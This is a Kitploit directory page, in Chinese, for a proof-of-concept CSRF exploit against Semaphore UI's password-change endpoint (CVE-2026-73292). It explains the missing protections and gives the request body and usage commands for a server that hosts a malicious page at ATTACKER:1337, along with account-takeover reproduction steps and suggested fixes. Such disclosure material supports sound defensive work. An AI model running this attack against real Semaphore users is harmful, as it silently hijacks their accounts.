Skip to content
KitploitKITPLOIT
工具博客
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
CVE-2026-73292 — 针对 CVE-2026-73292 的概念验证漏洞利用程序:对 Semaphore UI 密码更改端点发起 CSRF 攻击,提供一个恶意页面,可静默重置已认证用户的密码。 | Kitploit
工具/GitHubGitHub/camillegr/cve-2026-73292
漏洞分析漏洞利用Web应用程序漏洞利用渗透测试学习与教育对抗性攻击
GitHubcamillegr/cve-2026-73292

CVE-2026-73292

针对 CVE-2026-73292 的概念验证漏洞利用程序:对 Semaphore UI 密码更改端点发起 CSRF 攻击,提供一个恶意页面,可静默重置已认证用户的密码。

查看仓库
522天前尚未审核

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享

CVE-2026-73292 – Semaphore UI < 2.18.21 中的 CSRF 密码更改漏洞

仅供教育和负责任披露之用。

该漏洞已在 GHSA-8cj9-r88m-8945 中报告,影响 2.18.21 以下的 semaphoreui 版本。

漏洞

Semaphore UI 的密码更改端点未实现任何 CSRF 保护:

  • 无需 CSRF 令牌
  • 无需当前密码确认
  • 身份验证仅依赖会话 Cookie(semaphore),且未强制执行 SameSite

恶意页面可以静默更改任何访问它的已认证用户的密码。

受影响端点: POST /api/users/{id}/password

root@kitploit:~
{"password": "newpassword", "project_id": 1}

使用方法

root@kitploit:~
python poc_server.py -u http://TARGET:3000 -i USER_ID [-n NEW_PASSWORD] [-p PORT]

示例

root@kitploit:~
python poc_server.py -u http://192.168.1.10:3000 -i 1 -n pwn3d -p 1337

然后将受害者(已在 Semaphore 上认证)引导至 http://ATTACKER:1337。页面加载后,其密码会立即被更改。


复现步骤

  1. 启动 PoC 服务器:
    root@kitploit:~
    python poc.py -u http://TARGET:3000 -i 1
    
  2. 在浏览器中以受害者身份登录 Semaphore UI
  3. 访问 http://ATTACKER:1337
  4. 在 DevTools → Network 中:观察对 /api/users/1/password 的 POST 请求返回 HTTP 204
  5. 使用新密码登录,以确认账户已被接管

修复建议

  • 为所有状态变更端点添加 CSRF 令牌
  • 密码更改时要求确认当前密码
  • 在会话 Cookie 上设置 SameSite=Strict
下载工具
参数描述默认值
-u / --uriSemaphore 实例的基础 URL必填
-i / --user_id目标用户的 ID必填
-n / --new_password要设置的密码passwordchanged
-p / --port提供恶意页面服务的端口1337